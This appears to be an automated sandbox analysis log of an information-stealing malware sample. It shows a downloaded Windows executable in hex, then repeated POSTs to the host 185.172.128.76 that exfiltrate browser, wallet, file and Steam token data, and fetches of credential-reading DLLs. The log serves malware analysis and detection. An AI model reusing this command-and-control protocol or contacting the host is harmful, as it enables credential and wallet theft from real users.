                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:09:41 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFIHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 35 32 33 32 42 41 32 36 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 41 45 48 44 41 4b 45 43 47 43 41 4b 46 43 46 49 2d 2d 0d 0a Data Ascii: ------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="hwid"6A5232BA26AD2322695909------BFHDAEHDAKECGCAKFCFIContent-Disposition: form-data; name="build"default10------BFHDAEHDAKECGCAKFCFI--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 46 42 4b 4b 4a 44 48 4a 4b 45 43 42 47 44 41 4b 2d 2d 0d 0a Data Ascii: ------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HJDBFBKKJDHJKECBGDAKContent-Disposition: form-data; name="message"browsers------HJDBFBKKJDHJKECBGDAK--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"plugins------FCAFIJJJKEGIECAKKEHI--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFHost: 185.172.128.76Content-Length: 6183Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"------HIDGCFBFBFBKEBGCAFCG--
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"wallets------AAEGHJKJKKJDHIDHJKJD--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 2d 2d 0d 0a Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="message"files------DGHDHIDGHIDGIECBKKJJ--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECGCGHCGHCAKECBKJKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIJJEGDBFIIDGCAKJEBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJKKECFIECAKECAFBGCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFBAAFCGIEGDHIEBFIIHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHJKJEBGHJJKEBGIECAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHDBAAFIDGDAAAAAAAAHost: 185.172.128.76Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 2d 2d 0d 0a Data Ascii: ------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="token"0235f05bfdde8fa3fa3eef0df8ca9467bfae3161b4ead32c124f7c2674f26e5e63942ecb------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------IEHDBAAFIDGDAAAAAAAAContent-Disposition: form-data; name="file"------IEHDBAAFIDGDAAAAAAAA--
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFIIDAKJDGDHIDAKJJHost: 185.172.128.76Content-Length: 124911Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 32 33 35 66 30 35 62 66 64 64 65 38 66 61 33 66 61 33 65 65 66 30 64 66 38 63 61 39 34 36 37 62 66 61 65 33 31 36 31 62 34 65 61 64 33 32 63 31 32 34 66 37 63 32 36 37 34 66 32 36 65 35 65 36 33 39 34 32 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 68 65 72 37 68 34 38 72 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 4a 45 42 47 48 4a 4b 45 42 46 48 49 4a 44 48 43 2d 2d 0d 0a Data Ascii: 